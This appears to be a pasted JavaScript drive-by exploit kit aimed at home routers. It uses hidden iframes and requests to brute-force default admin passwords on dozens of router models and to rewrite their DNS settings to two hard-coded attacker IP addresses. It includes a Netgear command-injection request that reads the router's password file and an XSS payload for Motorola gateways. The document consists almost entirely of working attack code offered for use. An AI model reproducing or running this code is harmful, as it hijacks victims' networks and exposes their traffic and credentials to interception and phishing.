SHOW:
|
|
- or go back to the newest paste.
1 | var pDNS = "200.98.30.219"; | |
2 | var sDNS = "155.133.82.21"; | |
3 | var passlist=["pass","root","admin","123456789","123456","password","","<eopl>"]; | |
4 | var gstp=400; | |
5 | var pstp=5000; | |
6 | function exp(url, data, method){ | |
7 | if(method=="GET"){ | |
8 | document.write('<style type="text/css">@import url('+url+'&ju='+ Math.random()+');</style>'); | |
9 | if(url.indexOf('<eopl>')>0){var tm=setTimeout(function(){window.stop();},gstp);} | |
10 | } | |
11 | else{ | |
12 | document.write("<body></body>"); | |
13 | var ifrm = document.createElement("IFRAME"); | |
14 | ifrm.height="1px"; | |
15 | ifrm.width="1px"; | |
16 | document.body.appendChild(ifrm); | |
17 | ||
18 | var f=ifrm.contentWindow.document.createElement("FORM"); | |
19 | f.name='f'; | |
20 | f.method=method; | |
21 | f.action=url; | |
22 | var el=data.split('&'); | |
23 | for(i=0;i<el.length;i++) | |
24 | { | |
25 | var e=el[i].split('='); | |
26 | var t=ifrm.contentWindow.document.createElement('INPUT'); | |
27 | t.type='TEXT'; | |
28 | t.id=e[0]; | |
29 | t.name=e[0]; | |
30 | t.value=e[1]; | |
31 | f.appendChild(t); | |
32 | } | |
33 | ifrm.contentWindow.document.body.appendChild(f); | |
34 | f.submit(); | |
35 | var tm=setTimeout(function(){window.stop();},pstp); | |
36 | } | |
37 | } | |
38 | function srq(ip) { | |
39 | for(i=0;i<12;i++){ | |
40 | ||
41 | var url1 = "http://$1$"+ip+"/userRpm/WanDynamicIpCfgRpm.htm?wan=0&wantype=0&mtu=1500&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&hostName=TL-WR941ND&Save=Save"; | |
42 | var method = "GET"; | |
43 | url = url1.replace("$1$",""); | |
44 | var cred="admin"; | |
45 | if(passlist[i]!="") | |
46 | cred=cred+":"+passlist[i]; | |
47 | cred = cred+"@"; | |
48 | url = url1.replace("$1$",cred); | |
49 | exp(url, "", method); | |
50 | } | |
51 | ||
52 | } | |
53 | function e_belkin(ip) | |
54 | { | |
55 | var method = "POST"; | |
56 | var url = ""; | |
57 | var data =""; | |
58 | ||
59 | url="http://"+ip+"/cgi-bin/login.exe?pws=admin"; | |
60 | exp(url, "", "GET"); | |
61 | ||
62 | url="http://"+ip+"/cgi-bin/setup_dns.exe"; | |
63 | data="dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+"&dns2_1_t="+sDNS.split('.')[0]+"&dns2_2_t="+sDNS.split('.')[1]+"dns2_3_t="+sDNS.split('.')[2]+"&dns2_4_t="+sDNS.split('.')[3]+"&auto_from_isp=0"; | |
64 | exp(url, data, method); | |
65 | } | |
66 | ||
67 | function e_webcam(ip) | |
68 | { | |
69 | } | |
70 | ||
71 | function p_exp(ip) { | |
72 | e_belkin(ip); | |
73 | e_webcam(ip); | |
74 | ||
75 | var method = "POST"; | |
76 | var url = ""; | |
77 | var data =""; | |
78 | ||
79 | url = "http://admin:admin@"+ip+"/apply.cgi"; | |
80 | data="submit_button=index&change_action=&submit_type=&action=Apply&now_proto=dhcplan_ip_addr=192.168.1.1&lan_dhcp_start=192.168.1.100&lan_dhcp_end=192.168.1.149&lan_dns0="+pDNS+"&lan_dns1="+sDNS+"&lan_netmask=255.255.255.0&machine_name=Cisco01723&lan_proto=dhcp&dhcp_start_tmp=100&dhcp_num=50&dhcp_lease=0&lan_dns0_0=217&lan_dns0_1=12&lan_dns0_2=208&lan_dns0_3=38&lan_dns1_0=8&lan_dns1_1=8&lan_dns1_2=8&lan_dns1_3=8"; | |
81 | exp(url, data, method); | |
82 | ||
83 | url="http://admin:admin@"+ip+"/apply.cgi?/BAS_update.htm"; | |
84 | data="submit_flag=etherðer_dnsaddr1="+pDNS+"ðer_dnsaddr2="+sDNS+"ðer_dnsaddr3=8.8.8.8&Apply=Apply"; | |
85 | exp(url, data, method); | |
86 | ||
87 | url="http://"+ip+"/goform/AdvSetDns"; | |
88 | data="GO=wan_dns.asp&rebootflag=&DESN=1&DNSEN=on&DS1="+pDNS+"&DS2="+sDNS; | |
89 | exp(url, data, method); /*Unicorn WB-3300NR*/ | |
90 | ||
91 | url="http://"+ip+"/login.cgi"; | |
92 | data="login_name=admin&login_pass="; | |
93 | exp(url, data, method); | |
94 | ||
95 | url="http://"+ip+"/h_wan_fix.cgi"; | |
96 | data="static_dns1="+pDNS+"&static_dns2="+sDNS; | |
97 | exp(url, data, method); | |
98 | ||
99 | } | |
100 | ||
101 | function e_moto(ip) | |
102 | { | |
103 | /*var method = "GET"; | |
104 | var url ="http://" + ip + "/frames.asp?userId=admin&password=motorola"; | |
105 | exp(url, "", method); | |
106 | ||
107 | url ='http://' + ip + 'Gateway.Wan.hostName=&Gateway.Wan.dhcpClientEnabled=0&Gateway.Wan.ipAddress=0.0.0.0&Gateway.Wan.subnetMask=0.0.0.0&Gateway.Wan.defaultGateway=0.0.0.0&Gateway.Wan.dnsAddress1=3.3.3.3&Gateway.Wan.dnsAddress2=2.2.2.2&Gateway.Wan.dnsAddress3=0.0.0.0&Gateway.Wan.tcpSessionWaitTimeout=300&Gateway.Wan.udpSessionWaitTimeout=300&Gateway.Wan.icmpSessionWaitTimeout=300&urlOk=gateway%2FgatewayWAN.asp&urlError=gateway%2FgatewayWAN.asp%3FsessionId%3D2144%26error%3Derror&BUTTON_INPUT=Apply'; | |
108 | exp(url, "", POST); */ | |
109 | var i1 = document.createElement('IMG'); | |
110 | document.body.appendChild(i1); | |
111 | var i2 = document.createElement('IMG'); | |
112 | document.body.appendChild(i2); | |
113 | i1.src='http://'+ip+'/frames.asp?userId=admin&password=motorola'; | |
114 | i2.src='http://'+ip+'/goformFOO/AlFrame?Gateway.VirtualServerAdvConfig.add=Add&Gateway.VirtualServerAdvConfig.serverId.entry="%27%2B(window.onload%3Dfunction(){with(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dhcpClientEnabled=0%27%3Bz=%27%27%3Bfor(c in {%27Gateway.Wan.ipAddress%27:0,%27Gateway.Wan.subnetMask%27:0,%27Gateway.Wan.defaultGateway%27:0})z%2B=c%2B%27=%27%2Bdocument.getElementById(c).value%2B%27%26%27%3Bwith(document)body.appendChild(createElement(%27img%27)).src=%27/goformFOO/AlFrame?Gateway.Wan.dnsAddress1='+pDNS+'%26%27%2Bz%2B%27%26Gateway.Wan.dhcpClientEnabled=0%27})%2B%27'; | |
115 | ||
116 | }/*Motorola*/ | |
117 | ||
118 | function r_exp(ip) { | |
119 | ||
120 | var method = "GET"; | |
121 | var url ="";//http://admin:admin@"+ip+"?ju="+ Math.random(); | |
122 | //exp(url, "", method); | |
123 | ||
124 | url="http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=WW=`wget 'http://"+ip+"/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/¤tsetting.htm=1&curpath=/¤tsetting.htm=1' -O-` & wget --post-data='h_DNStype=Fixed&c4_DNS1address="+pDNS+"&c4_DNS2address="+sDNS+"&runtest=&todo=save&this_file=pppoe.htm&next_file=basic.htm' -O- 'http://$WW@"+ip+"/setup.cgi'&curpath=/¤tsetting.htm=1"; | |
125 | exp(url, "", method); /*DGN 1000/DGN2200*/ | |
126 | ||
127 | url="http://admin:admin@"+ip+"/start_apply.htm?current_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&wan_unit=0&wan_enable=1&wan_nat_x=1&wan_dnsenable_x=0"; | |
128 | exp(url, "", method); /*asus rt n66u*/ | |
129 | ||
130 | url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1="+pDNS+"&wan_dns2="+sDNS+"&wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS+"&productid=RT-N56U¤t_page=Advanced_WAN_Content.asp&modified=0&action_mode=apply&action_script=restart_wan_if&action_wait=5&preferred_lang=EN&firmver=3.0.0.4&lan_ipaddr=192.168.1.1&lan_netmask=255.255.255.0&wan_proto=dhcp&wan_enable=1&wan_nat_x=1&wan_upnp_enable=1&wan_dhcpenable_x=1&wan_dnsenable_x=0&dhcpc_mode=1"; | |
131 | exp(url, "", method); /*asus rt n56u*/ | |
132 | ||
133 | url ="http://admin:admin@"+ip+"/start_apply.htm?wan_dns1_x="+pDNS+"&wan_dns2_x="+sDNS; | |
134 | exp(url, "", method); /*asus rt n56u*/ | |
135 | ||
136 | url="http://"+ip+"/start_apply.htm?current_page=tcpipwan.asp&ipMode=pptp&typeForm=formWanTcpipSetup&submit-url=%2Ftcpipwan.asp&action_mode=Restart_WAN&flag=nodetect&preferred_lang=EN&wanType=autoIp&fixedIpMtuSize=1500&dnsMode=dnsManual&dns1="+pDNS+"&dns2="+sDNS; | |
137 | exp(url, "", method);/*asus nt-12*/ | |
138 | ||
139 | url = "http://admin:admin@"+ip+"/setup.cgi?todo=wan_dns1="+pDNS+""; | |
140 | exp(url, "", method); | |
141 | ||
142 | url = "http://admin:admin@"+ip+"/setup_dns.stm?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+""; | |
143 | exp(url, "", method); | |
144 | ||
145 | url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+""; | |
146 | exp(url, "", method); /*Philips*/ | |
147 | ||
148 | url = "http://admin:admin@"+ip+"/cgi-bin/setup_dns.exe?page=setup_dns&logout=&dns1_1="+pDNS.split('.')[0]+"&dns1_2="+pDNS.split('.')[1]+"&dns1_3="+pDNS.split('.')[2]+"&dns1_4="+pDNS.split('.')[3]+"&dns2_1="+sDNS.split('.')[0]+"&dns2_2="+sDNS.split('.')[1]+"dns2_3="+sDNS.split('.')[2]+"&dns2_4="+sDNS.split('.')[3]+""; | |
149 | exp(url, "", method);/*Motorola SBG901*/ | |
150 | ||
151 | url ="http://"+ip+"/ddnsmngr.cmd?action=apply&service=0&enbl=0&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1&dns6Type=DHCP" | |
152 | exp(url, "", method); | |
153 | ||
154 | url ="http://"+ip+"/apply.cgi?wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS; | |
155 | exp(url, "", method); | |
156 | ||
157 | url ="http://admin@"+ip+"/apply.cgi?wan_specify_dns=1&dhcpc_use_ucast=1&classless_static_route=0&asp_temp_51=&asp_temp_52=dhcpc&reboot_type=wan&button=Save+Settings&wan_proto=dhcpc&opendns_enable=0&dns_relay=1&hostname=DIR-615&dhcpc_use_ucast_sel=1&wan_primary_dns="+pDNS+"&wan_secondary_dns="+sDNS+"&wan_mtu=1500"; | |
158 | exp(url, "", method); | |
159 | ||
160 | url ="http://"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+""; | |
161 | exp(url, "", method); | |
162 | ||
163 | url ="http://admin:password@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+""; | |
164 | exp(url, "", method); | |
165 | ||
166 | url ="http://Admin:1234@"+ip+"/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+""; | |
167 | exp(url, "", method); | |
168 | ||
169 | url ="http://user:user@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1"; | |
170 | exp(url, "", method); | |
171 | ||
172 | url ="http://admin:admin@"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1"; | |
173 | exp(url, "", method); | |
174 | ||
175 | url ="http://"+ip+"/dnscfg.cgi?dnsPrimary="+pDNS+"&dnsSecondary="+sDNS+"&dnsDynamic=0&dnsRefresh=1"; | |
176 | exp(url, "", method); | |
177 | ||
178 | url = "http://admin:admin@"+ip+"/router/add_dhcp_segment.cgi?dhcp_on_chk=0&dhcp_server_on=1&dhcp_start_ip1="+ip+"&dhcp_end_ip1="+ip+"54&dhcp_start_ip2=&dhcp_end_ip2=&dhcp_start_ip3=&dhcp_end_ip3=&lan_as_gw_chk=0&is_lan_as_gw=1&custom_gw=&lease_time=86400&is_router_as_dns=1&dns1="+pDNS+"&dns2="+sDNS+"&dns3=&auto_bind=1&submitbutton=+%E4%BF%9D%E5%AD%98%E7%94%9F%E6%95%88+"; | |
179 | exp(url, "", method); | |
180 | ||
181 | url = "http://user:user@"+ip+"/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1="+ip+"&ip2="+ip+"&Lease=120&gateway=0.0.0.0&domain=&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=%B1%A3+%B4%E6"; | |
182 | exp(url, "", method); | |
183 | ||
184 | url = "http://admin:admin@"+ip+"/Basic.tri?dhcp_end=149&oldMtu=1500&oldLanSubnet=0&OldWanMode=0&SDHCP1=192&SDHCP2=168&SDHCP3=1&SDHCP4=100&EDHCP1=192&EDHCP2=168&EDHCP3=1&EDHCP4=150&pd=&now_proto=dhcp&old_domain=&chg_lanip="+ip+"&_daylight_time=1&wan_proto=0&router_name=WRT54G&wan_hostname=&wan_domain=&mtu_enable=0&lan_ipaddr_0=192&lan_ipaddr_1=168&lan_ipaddr_2=1&lan_ipaddr_3=1&lan_netmask=0&lan_proto=Enable&dhcp_start=100&dhcp_num=50&dhcp_lease=0&dns0_0="+pDNS.split('.')[0]+"&dns0_1="+pDNS.split('.')[1]+"&dns0_2="+pDNS.split('.')[2]+"&dns0_3="+pDNS.split('.')[3]+"&dns1_0="+sDNS.split('.')[0]+"&dns1_1="+sDNS.split('.')[1]+"&dns1_2="+sDNS.split('.')[2]+"&dns1_3="+sDNS.split('.')[3]+"&dns2_0=8&dns2_1=8&dns2_2=8&dns2_3=8&wins_0=0&wins_1=0&wins_2=0&wins_3=0&time_zone=%28GMT-08%3A00%29+Pacific+Time+%28USA+%26+Canada%29&daylight_time=ON&layout=en"; | |
185 | exp(url, "", method); | |
186 | ||
187 | url ="http://admin:admin@"+ip+"/userRpm/WanStaticIpCfgRpm.htm@wan=0&wantype=1&ip=0.0.0.0&mask=0.0.0.0&gateway=0.0.0.0&mtu=1500&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&Save=Save"; | |
188 | exp(url, "", method); | |
189 | ||
190 | url ="http://"+ip+"/userRpm/PPPoECfgAdvRpm.htm?wan=0&lcpMru=1480&ServiceName=&AcName=&EchoReq=0&manual=2&dnsserver="+pDNS+"&dnsserver2="+sDNS+"&downBandwidth=0&upBandwidth=0&Save=&Advanced=Advanced"; | |
191 | exp(url, "", method); | |
192 | ||
193 | url ="http://admin:password@"+ip+"/start_apply.htm?dnsserver="+pDNS+"&dnsserver2="+sDNS+""; | |
194 | exp(url, "", method); | |
195 | ||
196 | url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&uiViewNetMask=255.255.255.0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP="+ip+"00&sysPoolCount=100&dhcp_LeaseTime=259200&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+pDNS+""; | |
197 | exp(url, "", method); | |
198 | ||
199 | url = "http://root:root@"+ip+"/basic/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS; | |
200 | exp(url, "", method); | |
201 | ||
202 | url = "http://root:root@"+ip+"/uiViewIPAddr="+ip+"&dhcpFlag=0&ipAddrMain=192.168.2.1&uiViewNetMask=255.255.255.0&uiViewIPAddr2=0.0.0.0&ipAddrAlias=0.0.0.0&uiViewNetMask2=0.0.0.0&MorAFlag=0&lan_RIPVersion=RIP2-B&lan_RIPDirection=None&lan_IGMP=Disabled&igmp_snoop_act=0&dhcpTypeRadio=1&dhcp_StartIP=192.168.2.100&sysPoolCount=100&dhcp_LeaseTime=259200&VlanDHCP_Ethernet_Port_1=on&VlanDHCP_Ethernet_Port_2=on&VlanDHCP_Ethernet_Port_3=on&VlanDHCP_Ethernet_Port_4=on&uiViewDNSRelay=Use User Discovered DNS Server Only&uiViewDns1Mark="+pDNS+"&uiViewDns2Mark="+sDNS | |
203 | exp(url, "", method); | |
204 | ||
205 | url = "http://admin:admin@"+ip+"/prim.htm?i00110004="+pDNS+"&i00110005="+sDNS+"&i00035007="+pDNS+"&i00035008="+sDNS+"&i00040700="+pDNS+"&i00040800="+sDNS+"&i001e0008="+pDNS+"&i001e0009="+sDNS+"&_sce=%25ssc"; | |
206 | exp(url, "", method); /*DI 604*/ | |
207 | ||
208 | ||
209 | var t=setTimeout(function(){p_exp(ip);},1000); | |
210 | srq(ip); | |
211 | e_moto(ip); | |
212 | } | |
213 | var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome'); | |
214 | //if(document.referrer=="" || is_chrome<0){window.location.replace("about:blank")}; | |
215 | ||
216 | runweb(function(ip) { | |
217 | //if (ip.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)) { | |
218 | //var gw = ["192.168.1.1","192.168.15.1", "192.168.0.1", "192.168.0.227", "10.1.1.1", "10.0.0.1", "192.168.2.1", "192.168.1.2", "192.168.2.2", "192.168.1.254"]; | |
219 | var sip = ip.split("."); | |
220 | ||
221 | ip = sip[0] + "." + sip[1] + "." + sip[2] + ".1"; | |
222 | //var i = 0; | |
223 | //var j = 0; | |
224 | //for (i = 0; i < gw.length; i++) { | |
225 | // if (ip == gw[i]) { | |
226 | // j = j + 1; | |
227 | // break; | |
228 | // } | |
229 | //}; | |
230 | //i = i + 1; | |
231 | //if (j > 0) { | |
232 | r_exp(ip); | |
233 | //}; | |
234 | //} | |
235 | }); |